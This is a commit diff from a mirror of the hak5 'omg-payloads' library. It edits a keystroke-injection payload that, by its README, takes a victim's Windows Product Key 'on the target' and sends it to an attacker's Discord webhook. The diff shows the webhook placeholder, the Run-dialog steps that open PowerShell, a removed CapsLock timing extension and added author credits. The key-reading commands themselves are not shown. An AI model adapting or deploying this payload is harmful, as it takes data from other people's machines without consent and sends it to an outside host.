hak5
/
omg-payloads
mirror of https://github.com/hak5/omg-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Removing the CapsLock Error

pull/214/head
aleff-github 2023-12-12 08:37:45 +01:00
parent b358fc582a
commit 0b7958bf20
2 changed files with 26 additions and 32 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/README.md
View File

@ -17,6 +17,7 @@ No administrator permissions are required to do this, isn't that absurd, right?
- [Payload Description](#payload-description) - [Payload Description](#payload-description)
- [Product Key Types](#product-key-types) - [Product Key Types](#product-key-types)
- [Sources](#sources) - [Sources](#sources)
- [Credits](#credits)
## Note ## Note
@ -39,9 +40,7 @@ DEFINE #DISCORD-WEBHOOK example.com
Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself. Through this payload, you can export essential information related to the Windows Product Key using a Discord Webhook, ensuring that you identify its type and the key itself.
At the beginning of the payload, the DETECT_READY extension [[1](#sources)] is used to optimize the opening of a PowerShell session on the target. At the beginning of the payload, the commands are executed to obtain the necessary information about the Product Key:
The following commands are then executed to obtain the necessary information about the Product Key:
1. This command retrieves the currently in-use Product Key: 1. This command retrieves the currently in-use Product Key:
@ -87,5 +86,26 @@ Understanding these key types is crucial when working with Windows Product Keys,
## Sources ## Sources
- [1] Detect Ready: https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
- [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3 - [2] Is your Windows Product Key transferrable? https://www.tomshardware.com/how-to/transfer-windows-license-to-new-pc#is-your-windows-product-key-transferrable-3
## Credits
<h2 align="center"> Aleff</h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

28
payloads/library/exfiltration/Exfiltrate_Windows_Product_Key/payload.txt
View File

@ -12,34 +12,8 @@ REM ###################################################
REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg... REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
DEFINE #DISCORD-WEBHOOK example.com DEFINE #DISCORD-WEBHOOK example.com
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 2000
GUI r GUI r
DELAY 1000 DELAY 1000
STRING powershell STRING powershell